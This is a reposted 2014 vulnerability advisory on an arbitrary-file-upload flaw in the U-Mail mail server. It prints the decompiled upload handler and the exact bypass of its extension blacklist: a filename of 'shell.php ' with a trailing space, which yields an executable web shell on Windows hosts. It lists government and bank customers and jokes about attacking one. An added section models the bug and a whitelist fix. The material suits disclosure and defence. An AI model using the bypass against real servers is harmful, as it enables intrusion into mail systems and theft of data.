U-Mail Mail Service system arbitrary file upload + execution vulnerability (runtime defects and authentication bypass) - bug warning - the black bar safety net

ID MYHACK58:62201453337
Type myhack58
Reporter 路人甲@乌云
Modified 2014-09-07T00:00:00


Brief description:

PRODUCT DESCRIPTION (taken from the website): U-Mail has focused on the email field for 15 years, providing enterprises with software to easily build the most secure and stable e-mail system. Keywords: 15 years, the safest, the most stable {15 years the safest and most stable}. (I laughed.) Such wonderful code, such wonderful design, such wonderful configuration, so wonderful, super easy: using an ordinary function that could not be more ordinary, you can get a shell on the system. I had to... Related to: finance, government, banking, oil, military, the security industry and other important sectors; the impact is very large. Share of tested instances affected: 99.8%~100%. OTC: I wanted to take the Agricultural Bank down, but thought about it and decided against it; after all, just changing the numbers on a card to get rich overnight would be extremely unsafe..

Detailed description:

1 Product Description

U-Mail mail server is software for enterprises to easily build the most secure and stable e-mail system. U-Mail has focused on the email field for 15 years, targeting the stability and security needs of enterprise and institutional mailbox servers, and doing in-depth development around diversified and personalized e-mail application management, to maximize the functional flexibility and stability of the enterprise mailbox system, so that it becomes the most desirable mail system software for governments, universities, schools, enterprise groups, enterprises engaged in selling email software, network service providers and integrators. It supports digital certificate services and provides powerful management capabilities; digitally signed or digitally encrypted secure mail (S/MIME) can be composed or read directly in WebMail. It provides military-grade security strength (4096-bit DH/DSS encryption or 2048-bit RSA encryption), and uses the TLS/SSL Secure Sockets Layer communication protocol (1024-bit RSA encryption), supporting SSL SMTP, SSL POP3 and SSL IMAP4 secure communication services to prevent network eavesdropping and make communication more secure.

2 U-Mail customer case

The Chinese Ministry of Foreign Affairs, Agricultural Bank of China, Fuzhou City People's Congress Standing Committee, Nanning International Airport, Shanghai Telecom Company, Jiuquan Satellite Launch Center, the State Environmental Protection Administration, Shanghai Pudong Development Bank Hohhot Branch, Sichuan Provincial Intellectual Property Office, Jinzhong Commercial Bank, China Express Airlines, State Satellite Test Center, Guangyuan Commercial Bank, National Security Technology Research Institute of the People's Republic of China, Xiamen Maritime Safety Administration, Weihai City Commercial Bank ... There are many, many more not listed...

3 Start with the actual upload vulnerability, then the strange configuration issue

Vulnerable file: /client/mail/module/o_attach.php. The code is as follows (the code is Zend-encrypted, but...)

if ( ACTION == "attach-upload" ) {
    if ( $_FILES ) {
        $file_name   = $_FILES['Filedata']['name'];
        $file_type   = $_FILES['Filedata']['type'];
        $file_size   = $_FILES['Filedata']['size'];
        $file_source = $_FILES['Filedata']['tmp_name'];
        // suffix is taken from the client-supplied name and compared as-is
        $file_suffix = getfilenamesuffix( $file_name );
        $not_allow_ext = array( "php", "phps", "php3", "exe", "bat" );
        if ( in_array( $file_suffix, $not_allow_ext ) ) {
            dump_json( array( "status" => 0, "message" => el( "This file extension is not supported for upload", "" ) ) );
        }
        $path_target = getusercachepath( );
        do {
            $file_id = makerandomname( );
            // the unfiltered suffix is appended to the random name on disk
            $file_target = $path_target.$file_id.".".$file_suffix;
        } while ( file_exists( $file_target ) );
        // as decompiled; the success branch reporting an error suggests a negation dropped by the decompiler
        if ( move_uploaded_file( $file_source, $file_target ) ) {
            dump_json( array( "status" => 0, "message" => el( "Write file error, please contact the administrator!", "" ) ) );
        }
        $_SESSION[SESSION_ID]['attach_cache'][] = array( "id" => $file_id, "name" => $file_name, "type" => "1", "path" => $file_target, "size" => $file_size );
        dump_json( array( "status" => "1", "filename" => $file_name, "filesize" => $file_size, "file_id" => $file_id ) );
    } else {
        dump_json( array( "status" => "0", "message" => el( "Unable to locate the file to be uploaded!", "" ) ) );
    }
}

The main point here is that the vendor's fix for this vulnerability some time ago was incomplete and can be bypassed, so arbitrary files can again be uploaded and server permissions obtained. First look at how it was repaired:

$not_allow_ext = array( "php", "phps", "php3", "exe", "bat" );
if ( in_array( $file_suffix, $not_allow_ext ) ) {
    dump_json( array( "status" => 0, "message" => el( "This file extension is not supported for upload", "" ) ) );
}

This is a typical blacklist restriction, and blacklists simply do not work: they are easily bypassed. No specific proof is given here; for the file upload itself, refer to the previous vulnerability:

Link: U-Mail arbitrary file upload vulnerability (earlier report)

But since the vendor has already fixed that vulnerability, the method above will of course no longer upload successfully; a slight change is needed. Construct a form to upload, capture the request with Burp, and modify the uploaded file name as follows:

Content-Disposition: form-data; name="Filedata"; filename="shell.jpg"

modify to:

Content-Disposition: form-data; name="Filedata"; filename="shell.php "

Note: there is a space after shell.php. getfilenamesuffix() then returns "php " (with the trailing space), which is not in the blacklist, so the check passes and the file is written as <random>.php followed by a space. On a Windows host the file system drops the trailing space when the file is created, leaving a <random>.php in the cache directory that the web server executes.
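To make the bypass concrete, here is an added example (not U-Mail's code) that mirrors the blacklist check from o_attach.php above, shows why filename="shell.php " passes it, and places a whitelist-based check beside it. The suffix helper (suffix_as_vendor, an assumed reading of getfilenamesuffix()), the Windows trailing-space normalisation, the allowed-extension set and all function names are assumptions for illustration, not taken from the product.

```python
"""Added example, not U-Mail's code: the extension blacklist from
o_attach.php beside a whitelist-based replacement."""
import os
import re
import secrets
from typing import Optional

# Blacklist exactly as it appears in the decompiled o_attach.php.
NOT_ALLOW_EXT = {"php", "phps", "php3", "exe", "bat"}


def suffix_as_vendor(file_name: str) -> str:
    """Assumed behaviour of getfilenamesuffix(): everything after the last
    dot, returned without trimming or case folding."""
    return file_name.rsplit(".", 1)[1] if "." in file_name else ""


def vendor_allows(file_name: str) -> bool:
    """Mirror of `if (in_array($file_suffix, $not_allow_ext))` in the
    vendor code: True means the upload is accepted."""
    return suffix_as_vendor(file_name) not in NOT_ALLOW_EXT


def windows_saved_name(file_name: str) -> str:
    """Win32 drops trailing spaces and dots when it creates a file, so the
    name the extension check saw and the name on disk differ (assumes a
    Windows host)."""
    return file_name.rstrip(" .")


# Assumed whitelist for an attachment cache; adjust per deployment.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif", "pdf", "txt", "doc", "docx", "zip"}


def hardened_target(file_name: str, cache_dir: str) -> Optional[str]:
    """Whitelist check. Normalises the name the same way the file system
    will (strip path components, trailing spaces and dots), lower-cases the
    extension, requires it to be on the whitelist, and never reuses the
    client-supplied name on disk. Returns the target path or None."""
    base = os.path.basename(file_name.replace("\\", "/")).rstrip(" .")
    if "." not in base:
        return None
    ext = base.rsplit(".", 1)[1].lower()
    if not re.fullmatch(r"[a-z0-9]{1,5}", ext) or ext not in ALLOWED_EXT:
        return None
    # Random, server-chosen name: the only client influence is the extension.
    return os.path.join(cache_dir, secrets.token_hex(16) + "." + ext)


if __name__ == "__main__":
    # Constructed sample file names, including the trailing-space bypass.
    for name in ("shell.jpg", "shell.php", "shell.php ", "shell.php.", "shell.pHp"):
        verdict = "accept" if hardened_target(name, "cache") else "reject"
        print(f"{name!r:14} vendor_allows={vendor_allows(name)!s:5} "
              f"on_disk={windows_saved_name(name)!r:12} hardened={verdict}")
```

Running it shows "shell.php " and "shell.php." accepted by the vendor logic but saved on a Windows host as shell.php, while the whitelist version rejects them because it normalises the name before looking at the extension and only ever accepts known-harmless extensions. Whether "shell.pHp" executes depends on the web server's handler matching, which is why the hardened check folds case rather than relying on it.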
